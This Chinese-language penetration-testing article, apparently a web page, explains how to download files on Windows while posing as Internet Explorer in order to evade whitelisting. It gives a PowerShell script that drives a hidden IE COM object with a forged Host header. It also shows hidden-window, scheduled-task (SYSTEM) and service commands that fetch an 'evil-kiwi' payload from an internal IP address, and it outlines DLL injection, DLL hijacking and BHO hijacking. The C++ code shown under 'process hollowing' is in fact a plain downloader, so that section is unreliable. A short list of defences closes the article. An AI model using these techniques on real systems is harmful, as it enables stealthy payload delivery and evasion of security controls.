模拟IE浏览器下载文件的渗透技巧详解<\/h1>

0x00 前言<\/h2>
本文详细介绍了Windows系统下模拟IE浏览器实现文件下载的各种方法。这些技术不仅能够绕过白名单程序的拦截，还能在一定程度上隐藏下载行为。我们将从利用角度出发，全面分析各种实现方式，并总结相应的防御思路。<\/p>

0x01 技术分类<\/h2>

模拟IE浏览器下载文件的方法可分为两大类：<\/p>

主动模式<\/strong>：通过命令主动实现文件下载<\/p>

当前后台无IE进程<\/li>
当前后台有IE进程<\/li> <\/ul> <\/li>

被动模式<\/strong>：劫持用户行为，在用户打开IE时实现文件下载<\/p> <\/li> <\/ol>
0x02 主动模式实现方法<\/h2>
1. 后台无IE进程时的实现方式<\/h3>
a) 调用IE COM对象<\/h4>
通过COM对象InternetExplorer.Application<\/code>实现文件下载，后台进程为iexplore.exe。<\/p>
PowerShell实现代码<\/strong>：<\/p>
$ie_com = New-Object -ComObject InternetExplorer.Application <\/span><\/span>$ie_com.Silent = $True <\/span><\/span>$ie_com.Visible = $False <\/span><\/span>$Headers = "Host: <SNIP>.cloudfront.net<\/span>`r`n<\/span>"<\/span> <\/span><\/span>$ie_com.Navigate2("http:\/\/192.168.62.131\/index.html"<\/span>, 14, 0, $Null, $Headers) <\/span><\/span>while<\/span>($ie_com.busy -eq<\/span> $true) { Start-Sleep -Milliseconds 100 } <\/span><\/span>$html = $ie_com.document.GetType().InvokeMember('body'<\/span>, [System.Reflection.BindingFlags]<\/span>::GetProperty, $Null, $ie_com.document, $Null).InnerHtml <\/span><\/span>$html <\/span><\/span>$ie_com.Quit() <\/span><\/span><\/code><\/pre>注意事项<\/strong>：<\/p> 若IE从未运行过，执行以上代码会弹框提示<\/li> 该技术还有CS、JS和VBS的实现版本<\/li> <\/ul> b) Process Hollowing<\/h4> 创建傀儡进程iexplore.exe，传入参数CREATE_SUSPENDED<\/code>使进程挂起，清空进程内存数据，写入payload后恢复执行。<\/p> C++实现代码<\/strong>：<\/p> #include<\/span> <stdio.h><\/span> <\/span><\/span><\/span>#include<\/span> <windows.h><\/span> <\/span><\/span><\/span>#include<\/span> <wininet.h><\/span> <\/span><\/span><\/span>#define MAXBLOCKSIZE 1024 <\/span><\/span><\/span>#pragma comment( lib, "wininet.lib" ); <\/span><\/span><\/span><\/span> <\/span><\/span>void<\/span> download<\/span>(const<\/span> char<\/span> *<\/span>Url,const<\/span> char<\/span> *<\/span>save_as) { <\/span><\/span> byte Temp[MAXBLOCKSIZE]; <\/span><\/span> ULONG Number =<\/span> 1<\/span>; <\/span><\/span> FILE *<\/span>stream; <\/span><\/span> HINTERNET hSession =<\/span> InternetOpen((LPCSTR)"RookIE\/1.0"<\/span>, INTERNET_OPEN_TYPE_PRECONFIG, NULL, NULL, 0<\/span>); <\/span><\/span> if<\/span> (hSession !=<\/span> NULL) { <\/span><\/span> HINTERNET handle2 =<\/span> InternetOpenUrl(hSession, (LPCSTR)Url, NULL, 0<\/span>, INTERNET_FLAG_DONT_CACHE, 0<\/span>); <\/span><\/span> if<\/span> (handle2 !=<\/span> NULL) { <\/span><\/span> fopen_s(&<\/span>stream, save_as, "wb"<\/span>); <\/span><\/span> while<\/span> (Number ><\/span> 0<\/span>) { <\/span><\/span> InternetReadFile(handle2, Temp, MAXBLOCKSIZE -<\/span> 1<\/span>, &<\/span>Number); <\/span><\/span> fwrite(Temp, sizeof<\/span>(char<\/span>), Number, stream); <\/span><\/span> } <\/span><\/span> fclose(stream); <\/span><\/span> InternetCloseHandle(handle2); <\/span><\/span> handle2 =<\/span> NULL; <\/span><\/span> } <\/span><\/span> InternetCloseHandle(hSession); <\/span><\/span> hSession =<\/span> NULL; <\/span><\/span> } <\/span><\/span>} <\/span><\/span> <\/span><\/span>int<\/span> main<\/span>(int<\/span> argc, char<\/span>*<\/span> argv[]) { <\/span><\/span> download("https:\/\/github.com\/3gstudent\/test\/raw\/master\/putty.exe"<\/span>,"c:<\/span>\\<\/span>test<\/span>\\<\/span>putty.exe"<\/span>); <\/span><\/span> return<\/span> 0<\/span>; <\/span><\/span>} <\/span><\/span><\/code><\/pre>c) Process Doppelganging<\/h4> 类似于Process Hollowing，但使用transaction技术：<\/p> 打开正常文件并创建transaction<\/li> 在transaction内填入payload<\/li> 启动payload进程<\/li> 回滚transaction<\/li> <\/ol> 注意事项<\/strong>：<\/p> 需要对正常文件进行写入操作<\/li> 对iexplore.exe利用需要Trusted Installer权限<\/li> <\/ul> d) 隐蔽启动IE访问特定网址<\/h4> 方法1：cmd启动IE<\/strong><\/p> start<\/span> "C:\Program Files\Internet Explorer\iexplore.exe"<\/span> http:\/\/192.168.62.131\/evil-kiwi.png <\/span><\/span><\/code><\/pre>可通过ShowWindowAsync<\/code>API隐藏IE界面，PowerShell脚本参考：HiddenProcess.ps1<\/a><\/p> 方法2：PowerShell启动IE<\/strong><\/p> powershell -executionpolicy bypass -Command "Start-Process -FilePath \"<\/span>C:\Program Files\Internet Explorer\iexplore.exe\" -ArgumentList http:\/\/192.168.62.131\/evil-kiwi.png -WindowStyle Hidden"<\/span> <\/span><\/span><\/code><\/pre>缓存文件位置<\/strong>：<\/p> Win7: %LOCALAPPDATA%\Microsoft\Windows\Temporary Internet Files<\/code><\/li> Win8\/Win10: %LOCALAPPDATA%\Microsoft\Windows\INetCache\IE<\/code><\/li> <\/ul> 查找缓存文件<\/strong>：<\/p> dir<\/span> %LOCALAPPDATA%\*evil-kiwi*.png \/s \/b <\/span><\/span><\/code><\/pre>历史记录位置<\/strong>： %LOCALAPPDATA%\Microsoft\Windows\History\<\/code><\/p> 方法3：计划任务启动IE<\/strong><\/p> at 6:34 "C:\Program Files\Internet Explorer\iexplore.exe"<\/span> http:\/\/192.168.62.131\/evil-kiwi.png <\/span><\/span><\/code><\/pre>或<\/p> schtasks \/create \/RU SYSTEM \/RP ""<\/span> \/SC ONCE \/TN test1 \/TR "C:\Program Files\Internet Explorer\iexplore.exe http:\/\/192.168.62.131\/evil-kiwi.png"<\/span> \/ST 06:34 \/F <\/span><\/span><\/code><\/pre>系统级缓存位置<\/strong>： %windir%\System32\config\systemprofile\AppData\Local\Microsoft\Windows\<\/code><\/p> 方法4：创建服务启动IE<\/strong><\/p> sc create Test1 type= own binpath= "C:\Program Files\Internet Explorer\iexplore.exe"<\/span> <\/span><\/span>sc start test1 <\/span><\/span><\/code><\/pre>注：iexplorer.exe不支持与SCM交互，需要其他方式创建服务<\/em><\/p> e) 隐蔽启动IE进行DLL注入<\/h4> 隐蔽启动IE后，使用APC或Atombombing技术进行DLL注入。<\/p> APC注入参考<\/strong>：Inject-dll-by-APC<\/a><\/p> Atombombing参考<\/strong>：AtomBombing利用分析<\/p> 2. 后台有IE进程时的实现方式<\/h3> a) DLL注入(APC、Atombombing)<\/h4> 方法与上述相同，针对已存在的IE进程进行DLL注入。<\/p> 0x03 被动模式实现方法<\/h2> a) DLL劫持<\/h3> 实例：C:\Program Files\Internet Explorer\IEShims.dll<\/code><\/p> 开发工具<\/strong>：exportstoc<\/a><\/p> 注意事项<\/strong>：<\/p> 保留原DLL功能<\/li> 需要做互斥处理避免多次启动<\/li> <\/ul> b) BHO劫持<\/h3> 利用Browser Helper Object劫持IE浏览器，在页面打开时实现文件下载。<\/p> 参考<\/strong>：《利用BHO实现IE浏览器劫持》<\/p> 0x04 防御思路<\/h2> 针对各种攻击方法的防御措施：<\/p> 监控iexplore.exe的父进程<\/strong>：检测异常父进程关系<\/li> DLL注入检测<\/strong>：监控敏感API调用<\/li> DLL劫持防护<\/strong>：校验DLL签名和完整性<\/li> BHO防护<\/strong>：监控注册表变更<\/li> 进程行为分析<\/strong>：检测异常IE进程行为<\/li> 网络流量监控<\/strong>：检测异常下载行为<\/li> <\/ol> 0x05 总结<\/h2> 本文全面介绍了模拟IE浏览器下载文件的各种技术手段，包括主动和被动两种模式，涵盖了COM对象调用、进程注入、DLL劫持等多种技术。防御方应建立多层次的防护体系，从进程监控、API调用检测、注册表保护等多方面进行防护。<\/p>